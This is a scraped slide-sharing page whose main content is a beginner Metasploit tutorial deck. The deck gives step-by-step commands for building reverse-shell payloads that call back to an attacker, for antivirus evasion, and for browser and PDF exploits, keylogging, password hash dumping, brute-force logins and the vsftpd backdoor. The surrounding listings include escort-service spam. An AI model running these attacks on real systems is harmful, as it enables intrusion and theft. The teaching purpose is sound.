Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in DelhiRussian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhikauryashika82
 
1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdfQucHHunhnh
 
9548086042 for call girls in Indira Nagar with room service
9548086042 for call girls in Indira Nagar with room service9548086042 for call girls in Indira Nagar with room service
9548086042 for call girls in Indira Nagar with room servicediscovermytutordmt
 
microwave assisted reaction. General introduction
microwave assisted reaction. General introductionmicrowave assisted reaction. General introduction
microwave assisted reaction. General introductionMaksud Ahmed
 
fourth grading exam for kindergarten in writing
fourth grading exam for kindergarten in writingfourth grading exam for kindergarten in writing
fourth grading exam for kindergarten in writingTeacherCyreneCayanan
 
Grant Readiness 101 TechSoup and Remy Consulting
Grant Readiness 101 TechSoup and Remy ConsultingGrant Readiness 101 TechSoup and Remy Consulting
Grant Readiness 101 TechSoup and Remy ConsultingTechSoup
 
Measures of Dispersion and Variability: Range, QD, AD and SD
Measures of Dispersion and Variability: Range, QD, AD and SDMeasures of Dispersion and Variability: Range, QD, AD and SD
Measures of Dispersion and Variability: Range, QD, AD and SDThiyagu K
 
IGNOU MSCCFT and PGDCFT Exam Question Pattern: MCFT003 Counselling and Family...
IGNOU MSCCFT and PGDCFT Exam Question Pattern: MCFT003 Counselling and Family...IGNOU MSCCFT and PGDCFT Exam Question Pattern: MCFT003 Counselling and Family...
IGNOU MSCCFT and PGDCFT Exam Question Pattern: MCFT003 Counselling and Family...PsychoTech Services
 
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...fonyou31
 
Sanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdfSanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdfsanyamsingh5019
 
Interactive Powerpoint_How to Master effective communication
Interactive Powerpoint_How to Master effective communicationInteractive Powerpoint_How to Master effective communication
Interactive Powerpoint_How to Master effective communicationnomboosow
 
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdfBASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdfSoniaTolstoy
 
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Krashi Coaching
 
APM Welcome, APM North West Network Conference, Synergies Across Sectors
APM Welcome, APM North West Network Conference, Synergies Across SectorsAPM Welcome, APM North West Network Conference, Synergies Across Sectors
APM Welcome, APM North West Network Conference, Synergies Across SectorsAssociation for Project Management
 
Disha NEET Physics Guide for classes 11 and 12.pdf
Disha NEET Physics Guide for classes 11 and 12.pdfDisha NEET Physics Guide for classes 11 and 12.pdf
Disha NEET Physics Guide for classes 11 and 12.pdfchloefrazer622
 

Recently uploaded (20)

Mattingly "AI & Prompt Design: The Basics of Prompt Design"
Mattingly "AI & Prompt Design: The Basics of Prompt Design"Mattingly "AI & Prompt Design: The Basics of Prompt Design"
Mattingly "AI & Prompt Design: The Basics of Prompt Design"
 
General AI for Medical Educators April 2024
General AI for Medical Educators April 2024General AI for Medical Educators April 2024
General AI for Medical Educators April 2024
 
1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdf1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdf
 
social pharmacy d-pharm 1st year by Pragati K. Mahajan
social pharmacy d-pharm 1st year by Pragati K. Mahajansocial pharmacy d-pharm 1st year by Pragati K. Mahajan
social pharmacy d-pharm 1st year by Pragati K. Mahajan
 
Sports & Fitness Value Added Course FY..
Sports & Fitness Value Added Course FY..Sports & Fitness Value Added Course FY..
Sports & Fitness Value Added Course FY..
 
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in DelhiRussian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
 
1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf
 
9548086042 for call girls in Indira Nagar with room service
9548086042 for call girls in Indira Nagar with room service9548086042 for call girls in Indira Nagar with room service
9548086042 for call girls in Indira Nagar with room service
 
microwave assisted reaction. General introduction
microwave assisted reaction. General introductionmicrowave assisted reaction. General introduction
microwave assisted reaction. General introduction
 
fourth grading exam for kindergarten in writing
fourth grading exam for kindergarten in writingfourth grading exam for kindergarten in writing
fourth grading exam for kindergarten in writing
 
Grant Readiness 101 TechSoup and Remy Consulting
Grant Readiness 101 TechSoup and Remy ConsultingGrant Readiness 101 TechSoup and Remy Consulting
Grant Readiness 101 TechSoup and Remy Consulting
 
Measures of Dispersion and Variability: Range, QD, AD and SD
Measures of Dispersion and Variability: Range, QD, AD and SDMeasures of Dispersion and Variability: Range, QD, AD and SD
Measures of Dispersion and Variability: Range, QD, AD and SD
 
IGNOU MSCCFT and PGDCFT Exam Question Pattern: MCFT003 Counselling and Family...
IGNOU MSCCFT and PGDCFT Exam Question Pattern: MCFT003 Counselling and Family...IGNOU MSCCFT and PGDCFT Exam Question Pattern: MCFT003 Counselling and Family...
IGNOU MSCCFT and PGDCFT Exam Question Pattern: MCFT003 Counselling and Family...
 
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
 
Sanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdfSanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdf
 
Interactive Powerpoint_How to Master effective communication
Interactive Powerpoint_How to Master effective communicationInteractive Powerpoint_How to Master effective communication
Interactive Powerpoint_How to Master effective communication
 
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdfBASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
 
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
 
APM Welcome, APM North West Network Conference, Synergies Across Sectors
APM Welcome, APM North West Network Conference, Synergies Across SectorsAPM Welcome, APM North West Network Conference, Synergies Across Sectors
APM Welcome, APM North West Network Conference, Synergies Across Sectors
 
Disha NEET Physics Guide for classes 11 and 12.pdf
Disha NEET Physics Guide for classes 11 and 12.pdfDisha NEET Physics Guide for classes 11 and 12.pdf
Disha NEET Physics Guide for classes 11 and 12.pdf
 

Metasploit Humla for Beginner

  • 1. By : Ajay Srivastava
  • 2. Please don’t expect ….  How to evade antiviruses (antivirus evasion)  How to do pivoting  How to do port forwarding  How to write your own metasploit module
  • 3. Disclaimer All the information or technique you will be learning here is for educational purpose and should not be used for malicious activities.
  • 4. Agenda  Introduction  Basics of Metasploit  Information gathering  Exploitation  ( 11:30-11:45 - Break 1/ Tea )*  Meterpreter Basics  Post exploitation using meterpreter  Meterpeter scripts  ( 1:00 – 2:00 - Break 2 / Lunch )*
  • 5. Agenda  Metasploit utilities  Client-side exploitation  ( 4:00-4:20 – Break 3 / Tea )*  Auxiliary module  And we are done   * Lunch and Tea are self sponsored.
  • 6. Introduction  It’s not a Tool, it’s a Framework !!!
  • 7. History  Developed by H.D Moore in 2003  Originally written in Perl & later on rewritten in Ruby  Acquired by Rapid7 in 2009  Remains open source & free for use
  • 9. Libraries  Rex :  The basic library for most tasks  Handles sockets and protocols  MSF CORE :  Defines the Metasploit Framework  Provides the ‘basic’ API  MSF BASE :  Provides the ‘friendly’ API  Provides simplified APIs for use in the Framework
  • 10. Modules  Exploit  Modules used for actually attacking the systems and grabbing the access.  Payload  Piece of code which executes on remote system after successful exploitation.  Auxiliary  Exploit without payload. Used for scanning, fuzzing & doing various tasks.
  • 11. Modules  Encoders  Program which encodes our payload to avoid antivirus detection  Nops  Used to keep payload size consistent
  • 12. Payloads  Single  Completely standalone  eg: Add user  Stagers  Creates the network connection  Stages  Downloaded by the stagers  eg: Meterpreter
  • 13. Payloads  Payload is staged if represented by ‘/’ in the payload name  Windows/shell_bind_tcp  single payload with no stage  Windows/shell/bind_tcp  a stager (bind_tcp)  a stage (shell)
  • 15. MSFCONSOLE  Most powerful interface among all interfaces
  • 18. Armitage  Graphical version of Metasploit  Developed by Raphel Mudge  Supports both GUI & CLI
  • 20. Basics Commands  #msfconsole  #msfupdate  MSFConsole commands are classified in two types :  Core Commands  Database commands
  • 21. Core Commands  help or ?  banner  version  show  search  msf>search <module name>  info  msf>info <module name>  use  msf>use <exploit/auxiliary name>
  • 22. Core Commands  back  show options  set  msf>set <option> <value>  setg  msf>set <option> <value>  unset  msf>set <option> <value>  unsetg  msf>set <option> <value>
  • 23. Core Commands  show payloads  set payload  msf>set payload <payload name>  check  exploit  run
  • 24. Database Commands  Default database : PostgreSQL  Database.yml  /opt/metasploit/apps/pro/ui/config/database.yml  # cat database.yml  db_status  db_disconnect
  • 26. Database Commands  db_nmap  # db_nmap –sV –A –O <ip range>  hosts  # hosts –h  services  # services
  • 27. Database Commands  vulns  db_export  db_import  db_rebuild_cache  creds  db_load  db_unload
  • 28. Information Gathering  Auxiliary modules are the best !!!  Will cover in detail later  Using auxiliary/scanner/portscan/tcp  # msf>auxiliary/scanner/portscan/tcp Or  nmap <switches> <ip address>
  • 29. Exploitation  To list available exploits :  msf> search <exploit name>  To select an exploit :  msf> use <exploit name>  To get information about selected exploits  msf/exploitname> info  To check the options and set arguments  msf/exploitname> show options  To set the target host  msf/exploitname> set rhost <victim ip>
  • 30. Exploitation  To list supported payload with selected exploit  msf/exploitname> show payloads  To set the payload  msf/exploitname> set payload <payload name>  To set attacker machine  msf/exploitname> Set lhost <own ip>  To check if target is vuln to selected exploit  msf/exploitname> Check  To launch the attack  msf/exploitname> exploit
  • 31.
  • 32. Meterpreter  Post exploitation module  Runs in the exploited process context  Runs in memory and doesn’t create any file on disk  Encrypted communication  Stable and extensible
  • 33. Meterpreter  Classification  Core commands  File system commands  System commands  User interface commands  Priv commands  Networking commands
  • 34. Meterpreter : Core commands  background  sessions  ps  migrate  bgrun/bglist/bgkill  resource
  • 35. Meterpreter : Core commands  Run  #msf>run <script name>  Channel  #msf>execute –f <program> -c  Use  #msf>use <extension name>
  • 36. Meterpreter:File System Commands  pwd  cd  getlwd/getlcd  ls  cat/edit  download/upload
  • 37. Meterpreter:File System Commands  search  #msf>search –d <directory> -f *.<fileformat> -r  mkdir/rmdir  rm/rmdir  del
  • 38. Meterpreter : System Commands  sysinfo  getpid/getuid  shell  reboot  shutdown  ps
  • 39. Meterpreter : UI Commands  User interface & Webcam commands  idletime  keyscan_start  keyscan_dump  keyscan_stop  webcam_list  webcam_snap
  • 40. Meterpreter : Privs Commands  getsystem  hashdump  timestomp  timestomp –h  timestomp <filepath> -v { to display all atributes}  timestomp <filepath> -c <MM/DD/YYYY H:M:S>
  • 41. Meterpreter: Networking commands  arp  ipconfig/ifconfig  netstat  route  portfwd
  • 42. Meterpreter scripts  Path :  /usr/share/metasploit-framework/scripts/meterpreter  Or  meterpreter>run <tab multiple times>
  • 43. Meterpreter scripts run <script name>  run checkvm  run credcollect  run keylogrecorder  run winenum  run getcountermeasure  run getgui
  • 44. Meterpreter scripts  run scraper  run hostedit  run gettelnet  run arpscanner  run vnc  run filecollector  #msf>run filecollector –d <dnm> -f *.txt -r
  • 45.
  • 46. Metasploit Utilities  Three main utilities to generate shellcode and to evade antiviruses  Msfpayload  Msfencode  Msfvenom
  • 47. Msfpayload  To generate payload in different formats as exe ,C , Ruby and javascript  Using msfpayload :  root@kali:~# msfpayload -h  To check options  root@kali:~# msfpayload <payload name> O  root@:~# msfpayload windows/meterpreter/reverse_tcp O  Setting the options  root@kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=<attacker ip> LPORT=4422 X > exploit.exe  Sending this exploit.exe to victim
  • 48. Using Mutli-handler Exploit / setting listener  Setup listner:  msf > search multi/handler  msf > use exploit/multi/handler  msf exploit(handler) > set payload windows/meterpreter/reverse_tcp  msf exploit(handler) > show options  msf exploit(handler) > set lhost <attacker ip>  msf exploit(handler) > set lport 4422  msf exploit(handler) > exploit
  • 49. MSFEncode  To bypass antiviruses  Alters code , by converting into binary EXE. While interacting back , it will decode and execute the same into memory.  Payload is encoded by different encoders
  • 50. MSFEncode  root@kali:~# msfencode -h  Usage: /opt/metasploit/apps/pro/msf3/msfencode <options>  OPTIONS:  -e <opt> The encoder to use  -c <opt> The number of times to encode the data  -t <opt> The output format: bash,c,java,perl,pl,py,python,raw,sh,vbscript,asp,aspx,exe  -x <opt> Specify an alternate executable template  -k Keep template working; run payload in new thread (use with -x)
  • 51. MSFEncode  list encoders:  root@kali:~# msfencode –l  msfencode with msfpayload:  root@kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=<attacker ip> LPORT=4422 R | msfencode -e x86/shikata_ga_nai -c 8 -t exe > /var/www/exploitbypass.exe
  • 52. Client-side Attacks  Difficult to find server-side vulnerabilities  Most enterprises have incoming connections locked down with firewalls  Client-side attacks are the most common ones: - Browser based attacks - Social engineering attacks using malicious link or file
  • 53. Client-side Attacks:Browser based  Using IE 6 based Aurora exploit  msf > search aurora  msf > use exploit/windows/browser/ms10_002_aurora  msf exploit(ms10_002_aurora) > show options  msf exploit(ms10_002_aurora) > set srvhost <attacker ip>  msf exploit(ms10_002_aurora) > set srvport 80  msf exploit(ms10_002_aurora) > set uripath /test
  • 54. Client-side Attacks:Browser based  msf exploit(ms10_002_aurora) > show options  msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp  msf exploit(ms10_002_aurora) > show options  msf exploit(ms10_002_aurora) > set lhost <own ip>  msf exploit(ms10_002_aurora) > set lport 443  msf exploit(ms10_002_aurora) > exploit
  • 55. Client-side Attacks:File Format  Nowadays file format based exploits are exploiting targets in wild.  File formats such as pdf , doc or rtf are sent as attachment to the victim and expected to open it.  For eg:  Adobe util.printf() Bufferoverflow vulnerability  MS14-017 Microsoft Word RTF Object Confusion
  • 56. Client-side Attacks:File Format  Exploiting Adobe util.printf() Bufferoverflow vulnerability  msf > search adobe_utilprintf  msf > use exploit/windows/fileformat/adobe_utilprintf  msf exploit(adobe_utilprintf) > set filename resume.pdf  msf exploit(adobe_utilprintf) > show options  msf exploit(adobe_utilprintf) > set payload windows/meterpreter/reverse_tcp
  • 57. Client-side Attacks:File Format  msf exploit(adobe_utilprintf) > setg lhost <attacker ip>  msf exploit(adobe_utilprintf) > set lport 443  msf exploit(adobe_utilprintf) > exploit  Setup listener(i.e multi/handler)  Send this resume.pdf using some social engineering techniques.
  • 58. Client-side Attacks:File Format  Setting up listener on local machine :  msf > search multi/handler  msf > use exploit/multi/handler  msf exploit(handler) > show options  msf exploit(handler) > set lhost <own ip>  msf exploit(handler) > set lport 443  msf exploit(handler) > exploit
  • 59.
  • 60. Auxiliary Modules  Pre-exploitation module  Port scanners, fuzzers, banner grabbers, brute-force module etc.  Path:  /usr/share/metasploit-framework/modules/auxiliary or  Using show auxiliary on msfconsole :  msf > show auxiliary  Used without payloads
  • 61. Auxiliary Modules  Used same as exploits but without payload  msf> use <auxiliary name>  ‘run’ command instead of ‘exploit’ command  RHOSTS instead of RHOST
  • 62. Auxiliary Modules : Port scanners  Portscanner auxiliary module used for port scanning  Using portscanners :  msf > search portscan  msf > use auxiliary/scanner/portscan/tcp  msf auxiliary(tcp) > show options  msf auxiliary(tcp) > set rhosts <target>  msf auxiliary(tcp) > set ports 1-100  msf auxiliary(tcp) > set threads 10  msf auxiliary(tcp) > run
  • 63. Auxiliary Modules : SMB version fingerprinting  msf > search smb_version  msf > use auxiliary/scanner/smb/smb_version  msf auxiliary(smb_version) > show options  msf auxiliary(smb_version) > set rhosts 192.168.37.0/24  msf auxiliary(smb_version) > set threads 10  msf auxiliary(smb_version) > run
  • 64. Auxiliary Modules : Version Scanner  Banner grabbing of MySQL server :  msf > search MySQL  msf > use auxiliary/scanner/mysql/mysql_version  msf auxiliary(mysql_version) > show options  msf auxiliary(mysql_version) >set rhosts <target>  msf auxiliary(mysql_version) > run
  • 65. Auxiliary Modules: Login Scanners  Testing login attack on MySQL :  msf > use auxiliary/scanner/mysql/mysql_login  msf auxiliary(mysql_login) > show options  msf auxiliary(mysql_login) > setg rhosts <target>  msf auxiliary(mysql_login) > set user_file userfile.txt
  • 66. Auxiliary Modules: Login Scanners  msf auxiliary(mysql_login) > set pass_file passfile.txt  msf auxiliary(mysql_login) > set stop_on_success true  msf auxiliary(mysql_login) > run
  • 67. Auxiliary Modules : Telnet  msf > search telnet_login  msf > use auxiliary/scanner/telnet/telnet_login  msf auxiliary(telnet_login) > show options  msf auxiliary(telnet_login)) > setg rhosts <target ip>  msf auxiliary(telnet_login) > set user_file userfile.txt
  • 68. Auxiliary Modules : Telnet  msf auxiliary(telnet_login) > set pass_file passfile.txt  msf auxiliary(telnet_login) > set stop_on_success true  msf auxiliary(telnet_login) > run  Verify:  root@kali:~# telnet <target ip>
  • 69. Auxiliary Modules : Attacking FTP  msf > search ftp_version  msf > use auxiliary/scanner/ftp/ftp_version  msf auxiliary(ftp_version) > show options  msf auxiliary(ftp_version) > set rhosts <target>  msf auxiliary(ftp_version) > run  Result on metasploitable2: FTP Banner: '220 (vsFTPd 2.3.4)
  • 70. Auxiliary Modules : Attacking FTP  Now checking for ftp login  msf > search ftp_login  msf > use auxiliary/scanner/ftp/ftp_login  msf auxiliary(ftp_login) > set rhosts <target ip>  msf auxiliary(ftp_login) > set user_file userfile.txt  msf auxiliary(ftp_login) > set pass_file passfile.txt  msf auxiliary(ftp_login) > set stop_on_success true  msf auxiliary(ftp_login) > run  Successful FTP login for 'msfadmin':'msfadmin'
  • 71. Auxiliary Modules : Attacking FTP  From FTP version scan we know its version is vsFTPd 2.3.4  Now looking for exploit of this FTP version  msf > search vsFTPd 2.3.4  msf > use exploit/unix/ftp/vsftpd_234_backdoor  msf exploit(vsftpd_234_backdoor) > show options  msf exploit(vsftpd_234_backdoor) > set rhost <target ip>  msf exploit(vsftpd_234_backdoor) > show payloads  msf exploit(vsftpd_234_backdoor) > set payload cmd/unix/interact  msf exploit(vsftpd_234_backdoor) > exploit
  • 72.
  • 73. References  Metasploit Guide, http://packetstormsecurity.com/files/119280,  Securitytube Metasploit Framework Expert (SMFE course by Vivek Ramachandran)  Metasploit Unleashed ,  http://www.offensive-security.com/metasploit- unleashed/Main_Page